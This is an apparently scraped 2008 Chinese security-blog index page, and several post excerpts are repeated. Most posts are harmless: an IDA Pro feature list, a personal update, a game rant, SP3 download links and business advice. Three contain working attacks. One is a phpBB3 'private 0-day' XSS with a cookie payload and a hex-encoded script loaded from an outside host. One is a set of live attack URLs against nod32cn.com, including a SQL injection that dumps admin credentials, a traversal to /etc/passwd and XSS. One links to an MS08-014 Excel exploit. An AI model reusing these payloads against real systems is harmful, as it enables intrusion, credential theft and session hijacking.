二版科技寄来的NOD32安全套装
作者:ZhaoHuAn 日期:2008-08-22
XSS Private Messagging On PhpBB3(0day)
作者:ZhaoHuAn 日期:2008-08-18
################################################## ####################################
# #
# Authors: Dante90, WaRWolFz Crew #
# T0T4L, Ex Member Crew #
# Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# Description: XSS (Cross Site Scripting), Grab Status: 100%. #
# #
################################################## ####################################
XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8]
程序代码
Where is:
程序代码
Redirect Code [Ascii --> Hex]:
程序代码
# #
# Authors: Dante90, WaRWolFz Crew #
# T0T4L, Ex Member Crew #
# Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# Description: XSS (Cross Site Scripting), Grab Status: 100%. #
# #
################################################## ####################################
XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8]
程序代码http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=6779
Where is:
程序代码[xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))}
Redirect Code [Ascii --> Hex]:
程序代码[xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74...
nod32官方web渗透测试
作者:ZhaoHuAn 日期:2008-08-16
前几天Ntsill叫我帮忙看看nod32官方站点,最近他们在负责这个,呵呵,简单测试了一下还是存在一些问题的
SQL注入:
管理员密码就爆出来了
程序代码
程序代码
Directory traversal:
http://www.nod32cn.com:80/virus.php?prefix=../../../../../../../../etc/passwd%00.html
default.php searchword
virus.php 过滤不严导致的跨站
XSS:
程序代码
程序代码
SQL注入:
管理员密码就爆出来了
程序代码http://www.nod32cn.com:80/default.php?aid=1+and+1=2+union+all+select+concat(username,char(58),password),2+from+manager--&p=2&id=86
程序代码http://www.nod32cn.com:80/VisualizeShop.php?vid=7+and+1%3D0&action=Edit
Directory traversal:
http://www.nod32cn.com:80/virus.php?prefix=../../../../../../../../etc/passwd%00.html
default.php searchword
virus.php 过滤不严导致的跨站
XSS:
程序代码http://www.nod32cn.com:80/virus.php?prefix=>"><ScRiPt%20%0a%0d>alert(/xss/)%3B</ScRiPt>
程序代码http://www.nod32cn.co...
IDA Pro 5.3 feature list
作者:ZhaoHuAn 日期:2008-07-17
IDA Pro 5.3 feature list
New and improved debugger
The previous version of IDA Pro did not add anything to the debugger and we felt it is time for changes. We reimplemented the debugger core and improved the debugger modules.
The new debugger is more efficient and has better support for multithreaded applications. Breakpoint handling is faster, more logical and less deadlocking. Exception handling is more user friendly.
The debugger servers are multithreaded: they can handle multiple debug sessions, no need to kill a hung server or run multiple copies.
Debugger modules
We added two new debugger targets:
iPhone debugger. Click here for the details.
Symbian OS debugger. Click here for the details.
We publish the source code of all debugger modules.
The Linux debugger module has been improved to support multithreaded applications. We support NPTL based kernels.
Better analysis for PC and ARM...
New and improved debugger
The previous version of IDA Pro did not add anything to the debugger and we felt it is time for changes. We reimplemented the debugger core and improved the debugger modules.
The new debugger is more efficient and has better support for multithreaded applications. Breakpoint handling is faster, more logical and less deadlocking. Exception handling is more user friendly.
The debugger servers are multithreaded: they can handle multiple debug sessions, no need to kill a hung server or run multiple copies.
Debugger modules
We added two new debugger targets:
iPhone debugger. Click here for the details.
Symbian OS debugger. Click here for the details.
We publish the source code of all debugger modules.
The Linux debugger module has been improved to support multithreaded applications. We support NPTL based kernels.
Better analysis for PC and ARM...
Looooooong time no update:)
作者:ZhaoHuAn 日期:2008-07-16
确实又是两个多月没有更新了……
从在mifor师傅的blog转移到这里,我开始相信,过多依赖网络,还真会使灵感走向枯竭,思维模式也慢慢改变,离以前的那个自己越来越远。从以前的每天更新到现在,我已经认为,我是个不适合写的人,甚至一些很有想法的时候,也不想在BLOG上表现出来,看着每天不少的朋友光临,关注着我的朋友,还有申请连接的朋友,心中还是有些XX(词穷了),还有abu师傅,我知道这个空间其实远远不只当初的那几百M了 ^.^
从5月百度面试回来到现在,好象也没变什么,依旧还是那样,偶尔做一做知识整理,看看聚合,关心一下最近业界出了什么新闻,什么地方出了哪些安全问题,存在的安全隐患,新的漏洞。。只是,研究的时间少了,真的感觉自己,慢慢离安全这个话题越来越远,但是CC总说得对,走得多远还是得看自己。
最近刺发了一期的百度XSS,看了一下,还有我报过的几个,呵呵,从上次百度的面试中,其实也发现了这个问题,百度对WEB安全实在是很不重视,记得有几个XSS我还是直接报给相关人员的,一直到现在也没有补。还记得Dr.Li问我的几个WEB安全问题,也只是很轻描淡写的几句。我那时后在想,百度上次那个worm就没什么好说的了,而且临时挖就能找到一堆XSS。以至于现在刺暴出一系列XSS问题,我一点也不觉得吃惊。
不过兄弟们能去百度的话还是很好的,这段时间百度对安全还是相当的重视,而且web安全方面缺乏相关的人才,特别是应届毕业在百度的待遇在业界都很有竞争力,而且去的时候最好是系统部的Doctor Li面,他是一位知识渊博且很有亲和力和谦虚的人,在他面前你无需感到紧张 不过建议去的同学还是要加强其他方面的知识,尤其是linux和程序方面、安全编码经验等,做好充分的准备 :)
再过一年就毕业了,目前的想法是在北京工作,今天在这里BLOG一下,希望明年回头看到这些年走来的路,能够倍感欣慰。还是要感谢xundi师傅,cc总,ben总,nuke师...
从在mifor师傅的blog转移到这里,我开始相信,过多依赖网络,还真会使灵感走向枯竭,思维模式也慢慢改变,离以前的那个自己越来越远。从以前的每天更新到现在,我已经认为,我是个不适合写的人,甚至一些很有想法的时候,也不想在BLOG上表现出来,看着每天不少的朋友光临,关注着我的朋友,还有申请连接的朋友,心中还是有些XX(词穷了),还有abu师傅,我知道这个空间其实远远不只当初的那几百M了 ^.^
从5月百度面试回来到现在,好象也没变什么,依旧还是那样,偶尔做一做知识整理,看看聚合,关心一下最近业界出了什么新闻,什么地方出了哪些安全问题,存在的安全隐患,新的漏洞。。只是,研究的时间少了,真的感觉自己,慢慢离安全这个话题越来越远,但是CC总说得对,走得多远还是得看自己。
最近刺发了一期的百度XSS,看了一下,还有我报过的几个,呵呵,从上次百度的面试中,其实也发现了这个问题,百度对WEB安全实在是很不重视,记得有几个XSS我还是直接报给相关人员的,一直到现在也没有补。还记得Dr.Li问我的几个WEB安全问题,也只是很轻描淡写的几句。我那时后在想,百度上次那个worm就没什么好说的了,而且临时挖就能找到一堆XSS。以至于现在刺暴出一系列XSS问题,我一点也不觉得吃惊。
不过兄弟们能去百度的话还是很好的,这段时间百度对安全还是相当的重视,而且web安全方面缺乏相关的人才,特别是应届毕业在百度的待遇在业界都很有竞争力,而且去的时候最好是系统部的Doctor Li面,他是一位知识渊博且很有亲和力和谦虚的人,在他面前你无需感到紧张 不过建议去的同学还是要加强其他方面的知识,尤其是linux和程序方面、安全编码经验等,做好充分的准备 :)
再过一年就毕业了,目前的想法是在北京工作,今天在这里BLOG一下,希望明年回头看到这些年走来的路,能够倍感欣慰。还是要感谢xundi师傅,cc总,ben总,nuke师...
XSS Related
作者:ZhaoHuAn 日期:2008-05-11
From my over sized Firefox scrapbook and draft queue cleanup:
http://mybeni.rootzilla.de/mybeNi/2007/this_is_the_first_weblog_xss_worm/
http://www.seo-blackhat.com/xss-cheat-sheet/
http://www.owasp.org/index.php/Main_Page
http://mybeni.rootzilla.de/mybeNi/2007/this_is_the_first_weblog_xss_worm/
http://www.seo-blackhat.com/xss-cheat-sheet/
http://www.owasp.org/index.php/Main_Page
[zt]史上最垃圾的网游
作者:ZhaoHuAn 日期:2008-05-11
史上最垃圾的网游
见过15秒重新进入一次游戏,2分钟服务器重新启动一次的网游吗?
——没见过就去玩《欲望――龙之故乡》吧
你见过,封顶350级,只要有钱,一下午就能升到250级的网游吗?
——没见过就去玩《命运2》吧
你见过官网和私服同步更新的网游吗?
——没见过就去玩《奇迹》吧
你见过日日夜夜练了4年也没升49级网游吗?
——没见过就去玩《热血传奇》吧
你见过宣传做的吓死人,一年就倒闭的网游吗?
——没见过就去就怀念《A3》吧
你见过推出半年就倒闭的网游吗?
——没见过就去怀念《绝对女神》吧
你见过内测有100多人,公测最高56人在线的网游吗?
——没见过就去玩《飙车》吧
你见过每天卖特价包、高等级道具,最后代理公司跑人的网游吗?
——没见过就去玩《龙族》吧
你见过每天喊国产巨作的网游,里面NPC造型和店面牌匾全是日文的网游吗?
——没见过就去玩《QQ幻想》吧
你见过维护之后就出BUG,出完再临时维护,维护完再出BUG再维护的网络游戏吗? ——没见过就来《封神榜》吧!
你见过跑路跑一半被路边灯柱卡住,搞得像被栓住的狗一样,不得不退出再进的 游戏吗? ——没见过就去玩<数码精灵>吧
你见过封测1千多人`二测800多人三测不足500人的游戏嘛?
——没见过就去玩QQ三国吧
你见过官方自己卖外挂的网游吗?
——没见过就去玩《石器》吧
你见过用金山游侠之类的单机游戏修改器能修改属性的网游吗?
——没见过就去玩《精灵》吧
你见过高唱永久免费 ,其实XXX免费比收费还要贵的游戏吗? - ――-没见过就去玩<征途>
你见过高唱民族游戏、自主开发,其实抄袭;高唱永久免费,其实N多地图都高价收费;高唱密宝帐号万无一失,其实高价买个不保的垃圾;高唱为玩家着想,其实是个无耻的骗子、吸血鬼,只会欺骗玩家,只想尽办法赚钱,不...
见过15秒重新进入一次游戏,2分钟服务器重新启动一次的网游吗?
——没见过就去玩《欲望――龙之故乡》吧
你见过,封顶350级,只要有钱,一下午就能升到250级的网游吗?
——没见过就去玩《命运2》吧
你见过官网和私服同步更新的网游吗?
——没见过就去玩《奇迹》吧
你见过日日夜夜练了4年也没升49级网游吗?
——没见过就去玩《热血传奇》吧
你见过宣传做的吓死人,一年就倒闭的网游吗?
——没见过就去就怀念《A3》吧
你见过推出半年就倒闭的网游吗?
——没见过就去怀念《绝对女神》吧
你见过内测有100多人,公测最高56人在线的网游吗?
——没见过就去玩《飙车》吧
你见过每天卖特价包、高等级道具,最后代理公司跑人的网游吗?
——没见过就去玩《龙族》吧
你见过每天喊国产巨作的网游,里面NPC造型和店面牌匾全是日文的网游吗?
——没见过就去玩《QQ幻想》吧
你见过维护之后就出BUG,出完再临时维护,维护完再出BUG再维护的网络游戏吗? ——没见过就来《封神榜》吧!
你见过跑路跑一半被路边灯柱卡住,搞得像被栓住的狗一样,不得不退出再进的 游戏吗? ——没见过就去玩<数码精灵>吧
你见过封测1千多人`二测800多人三测不足500人的游戏嘛?
——没见过就去玩QQ三国吧
你见过官方自己卖外挂的网游吗?
——没见过就去玩《石器》吧
你见过用金山游侠之类的单机游戏修改器能修改属性的网游吗?
——没见过就去玩《精灵》吧
你见过高唱永久免费 ,其实XXX免费比收费还要贵的游戏吗? - ――-没见过就去玩<征途>
你见过高唱民族游戏、自主开发,其实抄袭;高唱永久免费,其实N多地图都高价收费;高唱密宝帐号万无一失,其实高价买个不保的垃圾;高唱为玩家着想,其实是个无耻的骗子、吸血鬼,只会欺骗玩家,只想尽办法赚钱,不...
File Download Injection
作者:ZhaoHuAn 日期:2008-05-07
Description:
Whitepaper discussing the topic of File Download Injection.
Author:Jeff Williams
links:
http://www.packetstormsecurity.org/papers/attack/Aspect_File_Download_Injection.pdf
Whitepaper discussing the topic of File Download Injection.
Author:Jeff Williams
links:
http://www.packetstormsecurity.org/papers/attack/Aspect_File_Download_Injection.pdf
Sp3
作者:ZhaoHuAn 日期:2008-04-29
*
http://download.windowsupdate.com/msdownload/update/software/svpk/2008/04/windowsxp-kb936929-sp3-x86-enu_c81472f7eeea2eca421e116cd4c03e2300ebfde4.exe
sp3英文版
MD5:bb25707c919dd835a9d9706b5725af58
http://download.windowsupdate.com/msdownload/update/software/svpk/2008/04/windowsxp-kb936929-sp3-x86-chs_D7067E86ABD4257454200D0C398D71C4CE6CD33E.exe
sp3中文版
http://download.windowsupdate.com/msdownload/update/software/svpk/2008/04/windowsxp-kb936929-sp3-x86-enu_c81472f7eeea2eca421e116cd4c03e2300ebfde4.exe
sp3英文版
MD5:bb25707c919dd835a9d9706b5725af58
http://download.windowsupdate.com/msdownload/update/software/svpk/2008/04/windowsxp-kb936929-sp3-x86-chs_D7067E86ABD4257454200D0C398D71C4CE6CD33E.exe
sp3中文版
MSOffice Excel Code Execution Exploit (MS08-014)
作者:ZhaoHuAn 日期:2008-03-28
Tested on:
Microsoft Windows XP SP2 && Microsoft Offset 2003 < SP3 or No MS08-014 Patch
download1:
http://www.chroot.org/exploits/zha0_ms08_014.rar
download2:
http://www.milw0rm.com/sploits/2008-zha0_ms08_014.rar
/debug
其实2月份就有人放出了exp~
Microsoft Windows XP SP2 && Microsoft Offset 2003 < SP3 or No MS08-014 Patch
download1:
http://www.chroot.org/exploits/zha0_ms08_014.rar
download2:
http://www.milw0rm.com/sploits/2008-zha0_ms08_014.rar
/debug
其实2月份就有人放出了exp~
网站务实运营的五个阶段
作者:ZhaoHuAn 日期:2008-02-29
网站务实运营的五个阶段
--篱笆网徐湘涛
第1阶段:看不见--是因为你的网站还小,
小到你的客户与业内人士都不知道,看不见你的存在,
这个时候,是你最开始的时期,
也是最为艰难的时刻,
你要做的就是想办法提升品牌,让更多人知道你的网站与你的服务。
第2阶段:看不起--是因为你刚刚初出茅庐,
无论是运营团队还是企业知名度来讲,实力都不大,
这个时候,业界人士是看不起你的。
第3阶段:看不懂--因为你的执着与坚强,
因为你有了正确的战略方向并且在执行的过程中,
把握住了对细节的重视,
所以你逐渐壮大了起来,这个时候,业内人士不会再看不见你了,
也不能再忽视你的存在了,
他是看不懂你,不知道你怎么这么快就能发展起来。
第4阶段:学不像--这个时候,大家就都来一窝蜂的来学你,
反正在中国,商业模式是没有知识产权保护而言,
带着比你大的资金或是比你牛的团队就来了,
但激情过去后的日子,他们会发现,就是学不像,
那是因为灵魂在你这里,人是不可以复制的。
第5阶段:追不上--最后的阶段是追不上,因为你快速成长了,
只要不犯原则性的错误,在你这个领域内,别人是很难追上你的。
--篱笆网徐湘涛
第1阶段:看不见--是因为你的网站还小,
小到你的客户与业内人士都不知道,看不见你的存在,
这个时候,是你最开始的时期,
也是最为艰难的时刻,
你要做的就是想办法提升品牌,让更多人知道你的网站与你的服务。
第2阶段:看不起--是因为你刚刚初出茅庐,
无论是运营团队还是企业知名度来讲,实力都不大,
这个时候,业界人士是看不起你的。
第3阶段:看不懂--因为你的执着与坚强,
因为你有了正确的战略方向并且在执行的过程中,
把握住了对细节的重视,
所以你逐渐壮大了起来,这个时候,业内人士不会再看不见你了,
也不能再忽视你的存在了,
他是看不懂你,不知道你怎么这么快就能发展起来。
第4阶段:学不像--这个时候,大家就都来一窝蜂的来学你,
反正在中国,商业模式是没有知识产权保护而言,
带着比你大的资金或是比你牛的团队就来了,
但激情过去后的日子,他们会发现,就是学不像,
那是因为灵魂在你这里,人是不可以复制的。
第5阶段:追不上--最后的阶段是追不上,因为你快速成长了,
只要不犯原则性的错误,在你这个领域内,别人是很难追上你的。
